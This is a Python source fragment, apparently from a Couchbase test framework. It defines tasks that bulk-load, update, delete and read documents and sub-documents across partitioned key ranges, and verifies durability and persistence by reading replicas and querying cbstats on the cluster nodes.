def __init__(self, cluster, bucket, client, generator, op_type,
exp, random_exp=False, exp_unit="seconds", flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
proxy_client=None, batch_size=1, timeout_secs=5,
compression=None, retries=5,
durability="", task_identifier="", skip_read_on_error=False,
suppress_error_table=False, sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
track_failures=True,
skip_read_success_results=False,
preserve_expiry=None, sdk_retry_strategy=None):
super(LoadDocumentsTask, self).__init__(
cluster, bucket, client, batch_size=batch_size,
timeout_secs=timeout_secs,
time_unit=time_unit,
compression=compression,
retries=retries, suppress_error_table=suppress_error_table,
sdk_client_pool=sdk_client_pool,
scope=scope, collection=collection,
preserve_expiry=preserve_expiry,
sdk_retry_strategy=sdk_retry_strategy)
self.thread_name = "LoadDocs_%s_%s_%s_%s_%s_%s" \
% (task_identifier,
op_type,
durability,
generator._doc_gen.start,
generator._doc_gen.end,
time.time())
self.generator = generator
self.skip_doc_gen_value = False
self.op_type = op_type
if self.op_type in [DocLoading.Bucket.DocOps.DELETE,
DocLoading.Bucket.DocOps.TOUCH,
DocLoading.Bucket.DocOps.READ]:
self.skip_doc_gen_value = True
self.exp = exp
self.abs_exp = self.exp
self.random_exp = random_exp
self.exp_unit = exp_unit
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.num_loaded = 0
self.durability = durability
self.fail = dict()
self.success = dict()
self.skip_read_on_error = skip_read_on_error
self.track_failures = track_failures
self.skip_read_success_results = skip_read_success_results
if proxy_client:
self.log.debug("Changing client to proxy %s:%s..."
% (proxy_client.host, proxy_client.port))
self.client = proxy_client
def has_next(self):
return self.generator.has_next()
def next(self, override_generator=None):
doc_gen = override_generator or self.generator
key_value = doc_gen.next_batch(self.skip_doc_gen_value)
if self.random_exp:
self.exp = random.randint(self.abs_exp / 2, self.abs_exp)
if self.sdk_client_pool is not None:
self.client = \
self.sdk_client_pool.get_client_for_bucket(self.bucket,
self.scope,
self.collection)
if self.op_type == DocLoading.Bucket.DocOps.CREATE:
success, fail = self.batch_create(
key_value,
persist_to=self.persist_to, replicate_to=self.replicate_to,
doc_type=self.generator.doc_type, durability=self.durability,
skip_read_on_error=self.skip_read_on_error)
if self.track_failures:
self.fail.update(fail)
elif self.op_type == DocLoading.Bucket.DocOps.UPDATE:
success, fail = self.batch_update(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
doc_type=self.generator.doc_type,
durability=self.durability,
skip_read_on_error=self.skip_read_on_error)
if self.track_failures:
self.fail.update(fail)
elif self.op_type == DocLoading.Bucket.DocOps.REPLACE:
success, fail = self.batch_replace(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
doc_type=self.generator.doc_type,
durability=self.durability,
skip_read_on_error=self.skip_read_on_error)
if self.track_failures:
self.fail.update(fail)
elif self.op_type == DocLoading.Bucket.DocOps.DELETE:
success, fail = self.batch_delete(key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability)
if self.track_failures:
self.fail.update(fail)
elif self.op_type == DocLoading.Bucket.DocOps.TOUCH:
success, fail = self.batch_touch(key_value,
exp=self.exp)
if self.track_failures:
self.fail.update(fail)
elif self.op_type == DocLoading.Bucket.DocOps.READ:
success, fail = self.batch_read(dict(key_value).keys())
if self.track_failures:
self.fail.update(fail)
if not self.skip_read_success_results:
self.success.update(success)
else:
self.set_exception(Exception("Bad operation: %s" % self.op_type))
if self.sdk_client_pool is not None:
self.sdk_client_pool.release_client(self.client)
self.client = None
self.docs_loaded += len(key_value)
class LoadSubDocumentsTask(GenericLoadingTask):
def __init__(self, cluster, bucket, client, generator,
op_type, exp, create_paths=False,
xattr=False,
exp_unit="seconds", flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1, timeout_secs=5,
compression=None, retries=5,
durability="", task_identifier="",
sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
skip_read_success_results=False,
preserve_expiry=None,
sdk_retry_strategy=None):
super(LoadSubDocumentsTask, self).__init__(
cluster, bucket, client, batch_size=batch_size,
timeout_secs=timeout_secs,
time_unit=time_unit, compression=compression,
sdk_client_pool=sdk_client_pool,
scope=scope, collection=collection,
preserve_expiry=preserve_expiry,
sdk_retry_strategy=sdk_retry_strategy)
self.thread_name = "LoadSubDocsTask-%s_%s_%s_%s_%s" % (
task_identifier,
generator._doc_gen.start,
generator._doc_gen.end,
op_type,
durability)
self.generator = generator
self.skip_doc_gen_value = False
self.op_type = op_type
self.exp = exp
self.create_path = create_paths
self.xattr = xattr
self.exp_unit = exp_unit
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.num_loaded = 0
self.durability = durability
self.fail = dict()
self.success = dict()
self.skip_read_success_results = skip_read_success_results
def has_next(self):
return self.generator.has_next()
def next(self, override_generator=None):
doc_gen = override_generator or self.generator
key_value = doc_gen.next_batch(self.skip_doc_gen_value)
if self.sdk_client_pool is not None:
self.client = \
self.sdk_client_pool.get_client_for_bucket(self.bucket,
self.scope,
self.collection)
if self.op_type == DocLoading.Bucket.SubDocOps.INSERT:
success, fail = self.batch_sub_doc_insert(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
create_path=self.create_path,
xattr=self.xattr)
self.fail.update(fail)
# self.success.update(success)
elif self.op_type == DocLoading.Bucket.SubDocOps.UPSERT:
success, fail = self.batch_sub_doc_upsert(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
create_path=self.create_path,
xattr=self.xattr)
self.fail.update(fail)
# self.success.update(success)
elif self.op_type == DocLoading.Bucket.SubDocOps.REMOVE:
success, fail = self.batch_sub_doc_remove(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
xattr=self.xattr)
self.fail.update(fail)
# self.success.update(success)
elif self.op_type == "replace":
success, fail = self.batch_sub_doc_replace(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
xattr=self.xattr)
self.fail.update(fail)
# self.success.update(success)
elif self.op_type in ['read', 'lookup']:
success, fail = self.batch_sub_doc_read(key_value,
xattr=self.xattr)
self.fail.update(fail)
if not self.skip_read_success_results:
self.success.update(success)
else:
self.set_exception(Exception("Bad operation type: %s"
% self.op_type))
self.docs_loaded += len(key_value)
if self.sdk_client_pool is not None:
self.sdk_client_pool.release_client(self.client)
self.client = None
class Durability(Task):
def __init__(self, cluster, task_manager, bucket, clients, generator,
op_type, exp, exp_unit="seconds", flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1,
timeout_secs=5, compression=None, process_concurrency=8,
print_ops_rate=True, retries=5, durability="",
majority_value=0, check_persistence=False,
sdk_retry_strategy=None):
super(Durability, self).__init__("DurabilityDocumentsMainTask_%s_%s"
% (bucket, time.time()))
self.majority_value = majority_value
self.fail = dict()
# self.success = dict()
self.create_failed = {}
self.update_failed = {}
self.delete_failed = {}
self.sdk_acked_curd_failed = {}
self.sdk_exception_crud_succeed = {}
self.sdk_acked_pers_failed = {}
self.sdk_exception_pers_succeed = {}
self.cluster = cluster
self.exp = exp
self.exp_unit = exp_unit
self.durability = durability
self.check_persistence = check_persistence
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.timeout_secs = timeout_secs
self.compression = compression
self.process_concurrency = process_concurrency
self.clients = clients
self.task_manager = task_manager
self.batch_size = batch_size
self.generator = generator
self.op_types = None
self.buckets = None
self.print_ops_rate = print_ops_rate
self.retries = retries
self.sdk_retry_strategy = sdk_retry_strategy
self.tasks = list()
if isinstance(op_type, list):
self.op_types = op_type
else:
self.op_type = op_type
if isinstance(bucket, list):
self.buckets = bucket
else:
self.bucket = bucket
def call(self):
generators = list()
gen_start = int(self.generator.start)
gen_end = max(int(self.generator.end), 1)
gen_range = max(int((
self.generator.end - self.generator.start) / self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(self.generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > self.generator.end:
partition_gen.end = self.generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
i = 0
for generator in generators:
task = self.Loader(
self.cluster, self.bucket, self.clients[i], generator,
self.op_type, self.exp, self.exp_unit, self.flag,
majority_value=self.majority_value,
persist_to=self.persist_to, replicate_to=self.replicate_to,
time_unit=self.time_unit, batch_size=self.batch_size,
timeout_secs=self.timeout_secs,
compression=self.compression,
instance_num=i, durability=self.durability,
check_persistence=self.check_persistence,
sdk_retry_strategy=self.sdk_retry_strategy)
self.tasks.append(task)
i += 1
try:
for task in self.tasks:
self.task_manager.add_new_task(task)
for task in self.tasks:
self.task_manager.get_task_result(task)
if task.__class__ == self.Loader:
self.create_failed.update(task.create_failed)
self.update_failed.update(task.update_failed)
self.delete_failed.update(task.delete_failed)
self.sdk_acked_curd_failed.update(
task.sdk_acked_curd_failed)
self.sdk_exception_crud_succeed.update(
task.sdk_exception_crud_succeed)
self.sdk_acked_pers_failed.update(
task.sdk_acked_pers_failed)
self.sdk_exception_pers_succeed.update(
task.sdk_exception_pers_succeed)
except Exception as e:
self.set_exception(e)
finally:
self.log.debug("=== Tasks in DurabilityDocumentsMainTask pool ===")
self.task_manager.print_tasks_in_pool()
self.log.debug("=================================================")
for task in self.tasks:
self.task_manager.stop_task(task)
for client in self.clients:
client.close()
class Loader(GenericLoadingTask):
"""
1. Start inserting data into buckets
2. Keep updating the write offset
3. Start the reader thread
4. Keep track of non durable documents
"""
def __init__(self, cluster, bucket, client, generator, op_type,
exp, exp_unit,
flag=0, majority_value=0, persist_to=0, replicate_to=0,
time_unit="seconds",
batch_size=1, timeout_secs=5,
compression=None, retries=5,
instance_num=0, durability="", check_persistence=False,
sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
sdk_retry_strategy=None):
super(Durability.Loader, self).__init__(
cluster, bucket, client, batch_size=batch_size,
timeout_secs=timeout_secs,
compression=compression,
sdk_client_pool=sdk_client_pool,
scope=scope, collection=collection,
sdk_retry_strategy=sdk_retry_strategy)
self.thread_name = "DurableDocLoaderTask_%d_%s_%d_%d_%s" \
% (instance_num, bucket,
generator._doc_gen.start,
generator._doc_gen.end,
op_type)
self.generator = generator
self.op_type = op_type
self.exp = exp
self.exp_unit = exp_unit
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.instance = instance_num
self.durability = durability
self.check_persistence = check_persistence
self.bucket = bucket
self.tasks = []
self.write_offset = self.generator._doc_gen.start
self.majority_value = majority_value
self.create_failed = {}
self.update_failed = {}
self.delete_failed = {}
self.docs_to_be_updated = {}
self.docs_to_be_deleted = {}
self.sdk_acked_curd_failed = {}
self.sdk_exception_crud_succeed = {}
self.sdk_acked_pers_failed = {}
self.sdk_exception_pers_succeed = {}
self.test_log.debug("Instance %s: doc loading starts from %s"
% (self.instance, generator._doc_gen.start))
self.task_manager = TaskManager()
def call(self):
self.start_task()
if self.check_persistence:
persistence = threading.Thread(target=self.Persistence)
persistence.start()
reader = threading.Thread(target=self.Reader)
reader.start()
self.log.debug("Starting loader thread '%s'" % self.thread_name)
try:
while self.has_next():
self.next()
except Exception as e:
self.set_exception(Exception(e.message))
self.log.debug("Loader thread '%s' completed" % self.thread_name)
self.log.debug("== Tasks in DurabilityDocumentLoaderTask pool ==")
self.task_manager.print_tasks_in_pool()
if self.check_persistence:
persistence.join()
reader.join()
self.complete_task()
def has_next(self):
return self.generator.has_next()
def next(self, override_generator=None):
doc_gen = override_generator or self.generator
key_value = doc_gen.next_batch()
if self.op_type == 'create':
_, f_docs = self.batch_create(
key_value, persist_to=self.persist_to,
replicate_to=self.replicate_to,
doc_type=self.generator.doc_type,
durability=self.durability)
if len(f_docs) > 0:
self.create_failed.update(f_docs)
elif self.op_type == 'update':
keys_for_update = list()
for item in key_value:
keys_for_update.append(item.getT1())
self.docs_to_be_updated.update(
self.batch_read(keys_for_update)[0])
_, f_docs = self.batch_update(
key_value, persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
doc_type=self.generator.doc_type)
self.update_failed.update(f_docs)
elif self.op_type == 'delete':
keys_for_update = list()
for item in key_value:
keys_for_update.append(item.getT1())
self.docs_to_be_deleted.update(
self.batch_read(keys_for_update)[0])
_, fail = self.batch_delete(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability)
self.delete_failed.update(fail)
else:
self.set_exception(Exception("Bad operation type: %s"
% self.op_type))
self.write_offset += len(key_value)
def Persistence(self):
partition_gen = copy.deepcopy(self.generator._doc_gen)
partition_gen.start = self.generator._doc_gen.start
partition_gen.itr = self.generator._doc_gen.start
partition_gen.end = self.generator._doc_gen.end
self.generator_persist = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
self.start = self.generator._doc_gen.start
self.end = self.generator._doc_gen.end
self.generator_persist._doc_gen.itr = self.generator_persist._doc_gen.start
self.persistence_offset = self.generator_persist._doc_gen.start
shells = {}
for server in self.cluster.servers:
shell = RemoteMachineShellConnection(server)
shells.update({server.ip: Cbstats(shell)})
while True:
if self.persistence_offset < self.write_offset or self.persistence_offset == self.end:
self.test_log.debug(
"Persistence: ReadOffset=%s, WriteOffset=%s, Reader: FinalOffset=%s"
% (self.persistence_offset,
self.write_offset,
self.end))
if self.generator_persist._doc_gen.has_next():
doc = self.generator_persist._doc_gen.next()
key, val = doc[0], doc[1]
vBucket = (((zlib.crc32(key)) >> 16) & 0x7fff) & (
len(self.bucket.vbuckets) - 1)
nodes = [self.bucket.vbuckets[vBucket].master]
if self.durability \
== Bucket.DurabilityLevel.PERSIST_TO_MAJORITY:
nodes += self.bucket.vbuckets[vBucket].replica
count = 0
if self.op_type == 'create':
try:
for node in nodes:
key_stat = shells[
node.split(":")[0]].vkey_stat(
self.bucket.name, key)
if key_stat["is_dirty"].lower() == "true":
self.test_log.error(
"Node: %s, Key: %s, key_is_dirty = %s" % (
node.split(":")[0], key,
key_stat["is_dirty"]))
else:
self.test_log.info(
"Node: %s, Key: %s, key_is_dirty = %s" % (
node.split(":")[0], key,
key_stat["is_dirty"]))
count += 1
except:
pass
if key not in self.create_failed.keys():
                                '''
                                This condition makes sure that the document
                                is persisted on at least 1 node
                                '''
if count == 0:
# if count < self.majority_value:
self.sdk_acked_pers_failed.update(
{key: val})
self.test_log.error(
"Key isn't persisted although SDK reports Durable, Key = %s" % key)
elif count > 0:
self.test_log.error(
"SDK threw exception but document is present in the Server -> %s" % key)
self.sdk_exception_crud_succeed.update(
{key: val})
else:
self.test_log.error(
"Document is rolled back to nothing during create -> %s" % (
key))
if self.op_type == 'update':
                            if key not in self.update_failed.keys():
try:
for node in nodes:
key_stat = shells[
node.split(":")[0]].vkey_stat(
self.bucket.name, key)
if key_stat[
"is_dirty"].lower() == "true":
self.test_log.error(
"Node: %s, Key: %s, key_is_dirty = %s" % (
node.split(":")[0], key,
key_stat["is_dirty"]))
else:
self.test_log.debug(
"Node: %s, Key: %s, key_is_dirty = %s" % (
node.split(":")[0], key,
key_stat["is_dirty"]))
count += 1
except:
pass
if not count > 0:
self.sdk_acked_pers_failed.update(
{key: val})
self.test_log.error(
"Key isn't persisted although SDK reports Durable, Key = %s getFromAllReplica = %s" % key)
if self.op_type == 'delete':
for node in nodes:
try:
key_stat = shells[
node.split(":")[0]].vkey_stat(
self.bucket.name, key)
if key_stat["is_dirty"].lower() == "true":
self.test_log.error(
"Node: %s, Key: %s, key_is_dirty = %s" % (
node.split(":")[0], key,
key_stat["is_dirty"]))
else:
self.test_log.debug(
"Node: %s, Key: %s, key_is_dirty = %s" % (
node.split(":")[0], key,
key_stat["is_dirty"]))
count += 1
except Exception as e:
pass
                            if key not in self.delete_failed.keys():
if count == (self.bucket.replicaNumber + 1):
# if count > (self.bucket.replicaNumber+1 - self.majority_value):
self.sdk_acked_pers_failed.update(
{key: val})
self.test_log.error(
"Key isn't Persisted-Delete although SDK reports Durable, Key = %s getFromAllReplica = %s" % key)
elif count >= self.majority_value:
self.test_log.error(
"Document is rolled back to original during delete -> %s" % (
key))
if self.persistence_offset == self.end:
self.log.warning("Breaking thread persistence!!")
break
self.persistence_offset = self.write_offset
for key, cbstat in shells.items():
cbstat.shellConn.disconnect()
def Reader(self):
partition_gen = copy.deepcopy(self.generator._doc_gen)
partition_gen.start = self.generator._doc_gen.start
partition_gen.itr = self.generator._doc_gen.start
partition_gen.end = self.generator._doc_gen.end
self.generator_reader = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
self.start = self.generator._doc_gen.start
self.end = self.generator._doc_gen.end
self.read_offset = self.generator._doc_gen.start
while True:
if self.read_offset < self.write_offset or self.read_offset == self.end:
self.test_log.debug(
"Reader: ReadOffset=%s, %sOffset=%s, Reader: FinalOffset=%s"
% (self.read_offset, self.op_type, self.write_offset,
self.end))
if self.generator_reader._doc_gen.has_next():
doc = self.generator_reader._doc_gen.next()
key, val = doc[0], doc[1]
if self.op_type == 'create':
result = self.client.get_from_all_replicas(key)
self.test_log.debug(
"Key = %s getFromAllReplica = %s" % (
key, result))
if key not in self.create_failed.keys():
if len(result) == 0:
# if len(result) < self.majority_value:
self.sdk_acked_curd_failed.update(
{key: val})
self.test_log.error(
"Key isn't durable although SDK reports Durable, Key = %s getFromAllReplica = %s"
% (key, result))
elif len(result) > 0:
if not (
SDKException.DurabilityAmbiguousException in
self.create_failed[key]["error"] or
SDKException.TimeoutException in
self.create_failed[key]["error"]):
self.test_log.error(
"SDK threw exception but document is present in the Server -> %s:%s"
% (key, result))
self.sdk_exception_crud_succeed.update(
{key: val})
else:
self.test_log.debug(
"Document is rolled back to nothing during create -> %s:%s"
% (key, result))
if self.op_type == 'update':
result = self.client.get_from_all_replicas(key)
if key not in self.update_failed.keys():
if len(result) == 0:
# if len(result) < self.majority_value:
self.sdk_acked_curd_failed.update(
{key: val})
self.test_log.error(
"Key isn't durable although SDK reports Durable, Key = %s getFromAllReplica = %s"
% (key, result))
else:
# elif len(result) >= self.majority_value:
temp_count = 0
for doc in result:
if doc["value"] == \
self.docs_to_be_updated[key][
"value"]:
self.test_log.error(
"Doc content is not updated yet on few nodes, Key = %s getFromAllReplica = %s"
% (key, result))
else:
temp_count += 1
                                    '''
                                    This makes sure that the value has been
                                    updated on at least 1 node
                                    '''
if temp_count == 0:
# if temp_count < self.majority_value:
self.sdk_acked_curd_failed.update(
{key: val})
else:
for doc in result:
if doc["value"] != \
self.docs_to_be_updated[key][
"value"]:
self.sdk_exception_crud_succeed.update(
{key: val})
self.test_log.error(
"Doc content is updated although SDK threw exception, Key = %s getFromAllReplica = %s"
% (key, result))
if self.op_type == 'delete':
result = self.client.get_from_all_replicas(key)
if key not in self.delete_failed.keys():
if len(result) > self.bucket.replicaNumber:
self.sdk_acked_curd_failed.update(result[0])
self.test_log.error(
"Key isn't durably deleted although SDK reports Durable, Key = %s getFromAllReplica = %s"
% (key, result))
elif len(result) == self.bucket.replicaNumber + 1:
self.test_log.warn(
"Document is rolled back to original during delete -> %s:%s"
% (key, result))
if self.read_offset == self.end:
self.test_log.fatal("BREAKING!!")
break
self.read_offset += 1
class LoadDocumentsGeneratorsTask(Task):
def __init__(self, cluster, task_manager, bucket, clients, generators,
op_type, exp, exp_unit="seconds", random_exp=False, flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1,
timeout_secs=5, compression=None, process_concurrency=8,
print_ops_rate=True, retries=5, durability="",
task_identifier="", skip_read_on_error=False,
suppress_error_table=False,
sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
monitor_stats=["doc_ops"],
track_failures=True,
preserve_expiry=None,
sdk_retry_strategy=None):
super(LoadDocumentsGeneratorsTask, self).__init__(
"LoadDocsGen_%s_%s_%s_%s_%s"
% (bucket, scope, collection, task_identifier, time.time()))
self.cluster = cluster
self.exp = exp
self.random_exp = random_exp
self.exp_unit = exp_unit
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.timeout_secs = timeout_secs
self.compression = compression
self.process_concurrency = process_concurrency
self.clients = clients
self.sdk_client_pool = sdk_client_pool
self.task_manager = task_manager
self.batch_size = batch_size
self.generators = generators
self.input_generators = generators
self.op_types = None
self.buckets = None
self.print_ops_rate = print_ops_rate
self.retries = retries
self.durability = durability
self.task_identifier = task_identifier
self.skip_read_on_error = skip_read_on_error
self.suppress_error_table = suppress_error_table
self.monitor_stats = monitor_stats
self.scope = scope
self.collection = collection
self.preserve_expiry = preserve_expiry
self.sdk_retry_strategy = sdk_retry_strategy
if isinstance(op_type, list):
self.op_types = op_type
else:
self.op_type = op_type
if isinstance(bucket, list):
self.buckets = bucket
else:
self.bucket = bucket
self.num_loaded = 0
self.track_failures = track_failures
self.fail = dict()
self.success = dict()
self.print_ops_rate_tasks = list()
def call(self):
self.start_task()
buckets_for_ops_rate_task = list()
if self.op_types:
if len(self.op_types) != len(self.generators):
self.set_exception(
Exception("Not all generators have op_type!"))
self.complete_task()
if self.buckets:
if len(self.op_types) != len(self.buckets):
self.set_exception(
Exception("Not all generators have bucket specified!"))
self.complete_task()
iterator = 0
tasks = list()
for generator in self.generators:
if self.op_types:
self.op_type = self.op_types[iterator]
if self.buckets:
self.bucket = self.buckets[iterator]
tasks.extend(self.get_tasks(generator))
iterator += 1
if self.print_ops_rate:
if self.buckets:
buckets_for_ops_rate_task = self.buckets
else:
buckets_for_ops_rate_task = [self.bucket]
for bucket in buckets_for_ops_rate_task:
bucket.stats.manage_task(
"start", self.task_manager,
cluster=self.cluster,
bucket=bucket,
monitor_stats=self.monitor_stats,
sleep=1)
try:
for task in tasks:
self.task_manager.add_new_task(task)
for task in tasks:
try:
self.task_manager.get_task_result(task)
self.log.debug("Items loaded in task {} are {}"
.format(task.thread_name, task.docs_loaded))
i = 0
while task.docs_loaded < (task.generator._doc_gen.end -
task.generator._doc_gen.start) \
and i < 60:
sleep(1, "Bug in java futures task. "
"Items loaded in task %s: %s"
% (task.thread_name, task.docs_loaded),
log_type="infra")
i += 1
except Exception as e:
self.test_log.error(e)
finally:
self.success.update(task.success)
if self.track_failures:
self.fail.update(task.fail)
if task.fail.__len__() != 0:
target_log = self.test_log.error
else:
target_log = self.test_log.debug
target_log("Failed to load {} docs from {} to {}"
.format(task.fail.__len__(),
task.generator._doc_gen.start,
task.generator._doc_gen.end))
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
finally:
if self.print_ops_rate:
for bucket in buckets_for_ops_rate_task:
bucket.stats.manage_task("stop", self.task_manager)
self.log.debug("========= Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("======================================")
for task in tasks:
self.task_manager.stop_task(task)
self.log.debug("Task '{0}' complete. Loaded {1} items"
.format(task.thread_name, task.docs_loaded))
if self.sdk_client_pool is None:
for client in self.clients:
client.close()
self.complete_task()
return self.fail
def get_tasks(self, generator):
generators = []
tasks = []
gen_start = int(generator.start)
gen_end = int(generator.end)
gen_range = max(
int((generator.end - generator.start) / self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for i in range(0, len(generators)):
task = LoadDocumentsTask(
self.cluster, self.bucket, self.clients[i], generators[i],
self.op_type, self.exp, self.random_exp, self.exp_unit,
self.flag,
persist_to=self.persist_to, replicate_to=self.replicate_to,
time_unit=self.time_unit, batch_size=self.batch_size,
timeout_secs=self.timeout_secs,
compression=self.compression,
durability=self.durability,
task_identifier=self.thread_name,
skip_read_on_error=self.skip_read_on_error,
suppress_error_table=self.suppress_error_table,
sdk_client_pool=self.sdk_client_pool,
scope=self.scope, collection=self.collection,
track_failures=self.track_failures,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
tasks.append(task)
return tasks
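    # Partitioning sketch (illustrative numbers): with generator.start=0,
    # generator.end=100000 and process_concurrency=8, gen_range is 12500, so
    # get_tasks() yields eight LoadDocumentsTask workers covering
    # [0, 12500), [12500, 25000), ..., each wrapped in a
    # BatchedDocumentGenerator of batch_size documents.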
class LoadSubDocumentsGeneratorsTask(Task):
def __init__(self, cluster, task_manager, bucket, clients,
generators,
op_type, exp, create_paths=False,
xattr=False, exp_unit="seconds", flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1,
timeout_secs=5, compression=None,
process_concurrency=8,
print_ops_rate=True, retries=5, durability="",
task_identifier="",
sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
preserve_expiry=None, sdk_retry_strategy=None):
thread_name = "SubDocumentsLoadGenTask_%s_%s_%s_%s_%s" \
% (task_identifier,
bucket.name,
op_type,
durability,
time.time())
super(LoadSubDocumentsGeneratorsTask, self).__init__(thread_name)
self.cluster = cluster
self.exp = exp
self.create_path = create_paths
self.xattr = xattr
self.exp_unit = exp_unit
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.timeout_secs = timeout_secs
self.compression = compression
self.process_concurrency = process_concurrency
self.clients = clients
self.task_manager = task_manager
self.batch_size = batch_size
self.generators = generators
self.input_generators = generators
self.op_types = None
self.buckets = None
self.print_ops_rate = print_ops_rate
self.retries = retries
self.durability = durability
self.sdk_client_pool = sdk_client_pool
self.scope = scope
self.collection = collection
self.preserve_expiry = preserve_expiry
self.sdk_retry_strategy = sdk_retry_strategy
if isinstance(op_type, list):
self.op_types = op_type
else:
self.op_type = op_type
if isinstance(bucket, list):
self.buckets = bucket
else:
self.bucket = bucket
self.print_ops_rate_tasks = list()
self.num_loaded = 0
self.fail = dict()
self.success = dict()
def call(self):
self.start_task()
buckets_for_ops_rate_task = list()
if self.op_types:
if len(self.op_types) != len(self.generators):
self.set_exception(
Exception("Not all generators have op_type!"))
self.complete_task()
if self.buckets:
if len(self.op_types) != len(self.buckets):
self.set_exception(
Exception(
"Not all generators have bucket specified!"))
self.complete_task()
iterator = 0
tasks = list()
for generator in self.generators:
if self.op_types:
self.op_type = self.op_types[iterator]
if self.buckets:
self.bucket = self.buckets[iterator]
tasks.extend(self.get_tasks(generator))
iterator += 1
if self.print_ops_rate:
if self.buckets:
buckets_for_ops_rate_task = self.buckets
else:
buckets_for_ops_rate_task = [self.bucket]
for bucket in buckets_for_ops_rate_task:
bucket.stats.manage_task(
"start", self.task_manager,
cluster=self.cluster,
bucket=bucket,
monitor_stats=["doc_ops"],
sleep=1)
try:
for task in tasks:
self.task_manager.add_new_task(task)
for task in tasks:
try:
self.task_manager.get_task_result(task)
except Exception as e:
self.log.error(e)
finally:
self.fail.update(task.fail)
self.success.update(task.success)
self.log.warning("Failed to load {} sub_docs from {} "
"to {}"
.format(task.fail.__len__(),
task.generator._doc_gen.start,
task.generator._doc_gen.end))
except Exception as e:
self.log.error(e)
self.set_exception(e)
finally:
if self.print_ops_rate:
for bucket in buckets_for_ops_rate_task:
bucket.stats.manage_task("stop", self.task_manager)
self.log.debug("===========Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("=======================================")
for task in tasks:
self.task_manager.stop_task(task)
if self.sdk_client_pool is None:
for client in self.clients:
client.close()
self.complete_task()
return self.fail
def get_tasks(self, generator):
generators = list()
tasks = list()
gen_start = int(generator.start)
gen_end = int(generator.end)
gen_range = max(int((generator.end - generator.start) /
self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
if not isinstance(generator, SubdocDocumentGenerator):
self.set_exception("Document generator needs to be of"
" type SubdocDocumentGenerator")
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for i in range(0, len(generators)):
task = LoadSubDocumentsTask(
self.cluster, self.bucket,
self.clients[i], generators[i],
self.op_type, self.exp,
create_paths=self.create_path,
xattr=self.xattr,
exp_unit=self.exp_unit,
flag=self.flag,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
time_unit=self.time_unit,
batch_size=self.batch_size,
timeout_secs=self.timeout_secs,
compression=self.compression,
retries=self.retries,
durability=self.durability,
scope=self.scope,
collection=self.collection,
sdk_client_pool=self.sdk_client_pool,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
tasks.append(task)
return tasks
class ContinuousDocOpsTask(Task):
def __init__(self, cluster, task_manager, bucket, clients, generator,
op_type="update", exp=0, flag=0, persist_to=0, replicate_to=0,
durability="", time_unit="seconds",
batch_size=1,
timeout_secs=5, compression=None,
process_concurrency=4,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
sdk_client_pool=None, sdk_retry_strategy=None):
super(ContinuousDocOpsTask, self).__init__(
"ContDocOps_%s_%s_%s_%s"
% (bucket.name, scope, collection, time.time()))
self.cluster = cluster
self.exp = exp
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.durability = durability
self.time_unit = time_unit
self.timeout_secs = timeout_secs
self.compression = compression
self.process_concurrency = process_concurrency
self.clients = clients
self.sdk_client_pool = sdk_client_pool
self.task_manager = task_manager
self.batch_size = batch_size
self.generator = generator
self.buckets = None
# self.success = dict()
self.fail = dict()
self.key = self.generator.name
self.doc_start_num = self.generator.start
self.doc_end_num = self.generator.end
